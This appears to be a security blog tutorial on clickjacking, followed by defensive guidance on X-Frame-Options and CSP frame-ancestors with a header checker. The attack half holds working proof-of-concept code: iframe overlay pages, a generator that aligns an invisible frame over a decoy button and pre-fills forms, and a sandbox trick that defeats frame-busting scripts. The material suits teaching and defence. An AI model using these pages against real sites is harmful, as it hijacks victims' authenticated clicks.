Before we get into the content here I want to clarify that I wasn’t able to find any CTF-type examples of clickjacking, so if you know of one please let me know.
What is Clickjacking?
Clickjacking is an attack in which a user is tricked into clicking actionable content on a hidden page (the real target site, loaded invisibly) while they believe they are interacting with the visible page in front of them (the attacker's decoy).
This is a bit vague, so a few examples should help with visualizing the attack. Imagine you follow a link from an email asking you to donate a few dollars to charity; all you need to do is enter some payment information and press a submit button. Without your knowledge, the clicks and keystrokes are actually landing on a different site, loaded invisibly on top of the donation page, where they perform a transaction in the session you already have there.
“How did this happen?” the user thinks to themselves…
The attack relies on an invisible but actionable web page, or a series of pages, containing a button or link loaded inside an `iframe`. An inline frame (`iframe`) is an HTML element that loads another HTML document within the current one, essentially putting another web page inside the parent page. You overlay the transparent `iframe` on the decoy page's content, so that when the user clicks and types on your decoy site, the input actually lands in the framed site. This differs from a CSRF attack in that the user has to interact with the page manually; in return, the request is made by the genuine site itself, in the victim's authenticated session, so anti-CSRF tokens do not stop it. It does depend on the browser sending the victim's session cookie to the framed site: a session cookie with `SameSite=Lax` or `SameSite=Strict` (Chrome treats cookies without the attribute as `Lax`) is not sent to a cross-site `iframe`, which defeats the attack before any click is hijacked.
What Does This Actually Look Like?
You’ll need a little experience with CSS and HTML, but it is all pretty straightforward. You place the target website in an `iframe` layered over a decoy website.
<style>
  iframe {
    position: relative;
    width: 800px;
    height: 800px;
    opacity: 0.1;   /* nearly invisible; a real attack uses 0 */
    z-index: 2;     /* on top, so it receives the clicks */
  }
  div {
    position: absolute;
    top: 25px;
    left: 555px;
    z-index: 1;     /* the visible decoy sits underneath */
  }
</style>
<div>Free money if you click here!</div>
<iframe src="https://gaberoy.zip"></iframe>
I made this example using my site. In this case I have the opacity set to very low to help you see how it might work.
You want to precisely place the button over the action you’d like the victim to perform. In my case, I want the victim to view the Home page on my site, which just about lines up with the `<div>` element.
Of course this isn’t limited to single clicks. If you know how the target web application’s forms are filled in, you can pre-populate them through the framed URL. For example, if you wanted people to leave a comment on your blog and the comment form takes its initial values from URL parameters, you could put the comment text in the `iframe`’s `src` query string so that the stolen click is the only interaction still needed to submit it.
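The overlay described above, written out as a small generator so the alignment is computed rather than guessed. This is an added example, not code from the original post: `buildTargetUrl`, `frameOffset`, `buildClickjackPage`, the target URL and the pixel coordinates are all assumptions made for illustration. It goes slightly beyond the post's single-click case by pre-filling the framed form through query parameters.

```javascript
// Added example, not code from the original post: generates a clickjacking
// proof-of-concept page from a description of where the target's button is.
// buildTargetUrl, frameOffset, buildClickjackPage and the sample target
// coordinates below are assumptions made for illustration.

// Pre-fill form fields through query parameters (assuming the target reads
// them), so the hijacked click is the only interaction still needed.
function buildTargetUrl(base, params) {
  const url = new URL(base);
  for (const [key, value] of Object.entries(params)) url.searchParams.set(key, value);
  return url.toString();
}

// Shift needed so that the target button's top-left corner sits exactly under
// the decoy button drawn at decoyButton on the attacker's page.
function frameOffset(targetButton, decoyButton) {
  return { left: decoyButton.x - targetButton.x, top: decoyButton.y - targetButton.y };
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function buildClickjackPage({
  targetUrl,                         // page being hijacked
  targetButton,                      // {x, y, w, h}: button inside the target page, CSS px
  decoyButton,                       // {x, y}: where the decoy button is drawn on our page
  frameSize = { w: 1200, h: 900 },   // large enough that the target button is inside the frame
  opacity = 0,                       // 0 for a real attack; raise it while aligning
  decoyText = 'Free money if you click here!',
}) {
  const { left, top } = frameOffset(targetButton, decoyButton);
  return `<!doctype html>
<style>
  body { margin: 0; position: relative; }
  #decoy {            /* what the victim sees, underneath */
    position: absolute; left: ${decoyButton.x}px; top: ${decoyButton.y}px;
    width: ${targetButton.w}px; height: ${targetButton.h}px; line-height: ${targetButton.h}px;
    background: #2a7; color: #fff; font: 16px sans-serif; text-align: center; z-index: 1;
  }
  #target {           /* what the click actually hits: on top, but transparent */
    position: absolute; left: ${left}px; top: ${top}px;
    width: ${frameSize.w}px; height: ${frameSize.h}px;
    border: 0; opacity: ${opacity}; z-index: 2;
  }
</style>
<div id="decoy">${escapeHtml(decoyText)}</div>
<!-- sandbox without allow-top-navigation blocks top.location frame-busters -->
<iframe id="target" src="${escapeHtml(targetUrl)}" sandbox="allow-forms allow-scripts"></iframe>
`;
}

// Constructed sample: a comment form whose submit button is at (640, 415) in
// the target page, hijacked by a decoy drawn at (100, 200). Opacity is left at
// 0.3 so the overlay can be checked by eye; set it to 0 once it lines up.
const DEMO_PAGE = buildClickjackPage({
  targetUrl: buildTargetUrl('https://target.example/comment', { post: '7', comment: 'Great post' }),
  targetButton: { x: 640, y: 415, w: 120, h: 40 },
  decoyButton: { x: 100, y: 200 },
  opacity: 0.3,
});
console.log(DEMO_PAGE); // save the output as poc.html and open it in a browser
```

Run it with Node, save the printed HTML, and open it: the decoy button is drawn at (100, 200) while the frame is shifted by (-540, -215) so the target's button lands exactly on top of it. Whether the framed form actually submits in the victim's session depends on the target's session cookie reaching the frame, which the `SameSite` attribute controls.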
Countermeasures
These attacks are possible whenever a website can be framed. Some sites use frame-busting scripts: JavaScript on the target page that tries to detect that it is framed and break out. Those scripts, and the anti-clickjacking features built into some browser extensions, usually do some or all of the following:
- Enforce that the application window is the top window
- Make every frame visible
- Prevent clicking on frames that aren’t visible
- Intercept and flag potential clickjacking attacks
If you want to work around a frame-busting script, you can try the HTML5 `iframe` `sandbox` attribute. When it is set to `allow-forms` or `allow-scripts` and `allow-top-navigation` is omitted, the framed page can still run and can still notice that `top !== self`, but its attempt to navigate the top window (`top.location = self.location`, the classic frame-buster) is blocked by the sandbox, so your page stays in place. A frame-buster written the other way round (hide the page with CSS and only reveal it when the script confirms it is the top window) is not defeated by this trick, since the page simply stays hidden.
It might look like this:
<iframe id="vulnerable_website" src="vulnerable_website" sandbox="allow-forms"></iframe>
Both the `allow-forms` and `allow-scripts` values permit the specified actions within the `iframe`, while top-level navigation stays disabled. This inhibits frame-busting behavior while preserving the functionality you need in the targeted site.
You can also combine this with XSS and chain multiple steps together. So when you see something like this in a pentest, don’t stop there; get creative.
Prevention
This is a client-side attack against any application that lets itself be framed, and there are two popular, easy-to-use countermeasures that don’t rely on frame-busting scripts. A quick check is to fetch a sensitive page with `curl -sI` and look for the two response headers below; if neither is present, the page can be framed.
X-Frame-Options
This response header gives the website owner control over whether the page can be framed, with two self-explanatory directives:
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
`DENY` blocks framing entirely; `SAMEORIGIN` allows frames only from the same origin. A third directive, `ALLOW-FROM https://example_website.com`, still appears in older documentation but is obsolete: current browsers ignore it, which leaves the page frameable, so use the CSP directive below when a specific third party needs to frame you.
Content Security Policy
There is also a handy CSP directive for preventing clickjacking, `frame-ancestors`. You set it in a similar fashion to `X-Frame-Options`:
Content-Security-Policy: frame-ancestors 'none';
Content-Security-Policy: frame-ancestors 'self';
Content-Security-Policy: frame-ancestors 'self' https://example_website.com;
`'none'` corresponds to `DENY` and `'self'` to `SAMEORIGIN`; listing origins is the supported replacement for `ALLOW-FROM`. Two details matter in practice: browsers that understand `frame-ancestors` ignore `X-Frame-Options` when both are present, so send both (CSP for current browsers, `X-Frame-Options` as the fallback) and make sure they agree; and `frame-ancestors` only works as an HTTP header, it is ignored in a `<meta http-equiv>` tag.
Of course, make sure you test these in your environment before pushing to production. Headers that are only applied to some routes (an error page, an older endpoint, a static file that happens to contain a form) still leave those pages frameable, so check the responses of the sensitive pages themselves, not just the home page.
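A checker that applies the precedence rules just described, as an added example that is not part of the original post: `checkFraming` takes a response's headers and decides whether a cross-site attacker can frame the page, and `protectiveHeaders` produces the header pair to send. The function names and the sample header sets are assumptions constructed for illustration.

```javascript
// Added example, not code from the original post: checkFraming() reads a
// response's headers and decides whether a cross-site attacker can frame the
// page, applying the precedence browsers use; protectiveHeaders() produces the
// header set to send. Function names and sample header sets are assumptions.

// Header objects: names lowercased, values as arrays. A response may carry
// several CSP headers, and one header line may hold comma-separated values.
function getHeader(headers, name) {
  return (headers[name.toLowerCase()] || []).flatMap(v => v.split(','));
}

// Source list of the first `name` directive across the given CSP policies,
// lowercased, or null when no policy carries that directive.
function cspDirective(policies, name) {
  for (const policy of policies) {
    for (const directive of policy.split(';')) {
      const tokens = directive.trim().split(/\s+/).filter(Boolean);
      if (tokens.length && tokens[0].toLowerCase() === name) {
        return tokens.slice(1).map(t => t.toLowerCase());
      }
    }
  }
  return null;
}

function checkFraming(headers) {
  // 1. An enforced frame-ancestors directive takes precedence; browsers that
  //    support it ignore X-Frame-Options entirely. A report-only policy
  //    enforces nothing, so it is deliberately not consulted.
  const sources = cspDirective(getHeader(headers, 'content-security-policy'), 'frame-ancestors');
  if (sources !== null) {
    if (sources.length === 0 || sources.includes("'none'")) {
      return { frameable: false, mechanism: 'csp', detail: "frame-ancestors 'none'" };
    }
    // '*' or a bare scheme such as https: admits every origin on that scheme.
    const open = sources.filter(s => s === '*' || /^[a-z][a-z0-9+.-]*:$/.test(s));
    if (open.length) {
      return { frameable: true, mechanism: 'csp', detail: `frame-ancestors open to any origin via ${open.join(' ')}` };
    }
    return { frameable: false, mechanism: 'csp', detail: `frame-ancestors limited to ${sources.join(' ')}` };
  }

  // 2. Otherwise X-Frame-Options decides. Values are case-insensitive. With
  //    several distinct values, browsers deny if any of them is DENY and
  //    otherwise ignore the header. ALLOW-FROM is obsolete and, like any other
  //    unknown value, is ignored, which leaves the page frameable.
  const values = [...new Set(getHeader(headers, 'x-frame-options').map(v => v.trim().toLowerCase()))];
  if (values.length === 0) {
    return { frameable: true, mechanism: 'none', detail: 'neither frame-ancestors nor X-Frame-Options is set' };
  }
  if (values.length > 1) {
    return values.includes('deny')
      ? { frameable: false, mechanism: 'xfo', detail: `conflicting values, DENY wins: ${values.join(', ')}` }
      : { frameable: true, mechanism: 'xfo', detail: `conflicting values are ignored: ${values.join(', ')}` };
  }
  if (values[0] === 'deny' || values[0] === 'sameorigin') {
    return { frameable: false, mechanism: 'xfo', detail: `X-Frame-Options: ${values[0].toUpperCase()}` };
  }
  return { frameable: true, mechanism: 'xfo', detail: `X-Frame-Options value ignored by current browsers: ${values[0]}` };
}

// Headers to send. CSP covers current browsers; X-Frame-Options is the
// fallback and is only emitted when it can express the same policy
// (there is no working X-Frame-Options form for third-party ancestors).
function protectiveHeaders({ self = false, ancestors = [] } = {}) {
  if (!self && ancestors.length === 0) {
    return { 'content-security-policy': ["frame-ancestors 'none'"], 'x-frame-options': ['DENY'] };
  }
  const sources = [...(self ? ["'self'"] : []), ...ancestors];
  const headers = { 'content-security-policy': [`frame-ancestors ${sources.join(' ')}`] };
  if (ancestors.length === 0) headers['x-frame-options'] = ['SAMEORIGIN'];
  return headers;
}

// Constructed sample responses, as a pentester might see them.
const SAMPLES = {
  'no headers': {},
  'legacy deny': { 'x-frame-options': ['DENY'] },
  'obsolete allow-from': { 'x-frame-options': ['ALLOW-FROM https://partner.example'] },
  'csp overrides xfo': { 'x-frame-options': ['DENY'], 'content-security-policy': ["default-src 'self'; frame-ancestors *"] },
  'report-only': { 'content-security-policy-report-only': ["frame-ancestors 'none'"] },
  'hardened': protectiveHeaders({ self: true }),
};
for (const [name, headers] of Object.entries(SAMPLES)) {
  const r = checkFraming(headers);
  console.log(`${name.padEnd(20)} frameable=${r.frameable} (${r.mechanism}: ${r.detail})`);
}
```

The "csp overrides xfo" sample is the one that catches people out: `X-Frame-Options: DENY` is present, yet a sloppy `frame-ancestors *` in the CSP reopens the page in every browser that understands CSP. Feed the checker the headers from `curl -sI` on each sensitive page to confirm that the two mechanisms agree.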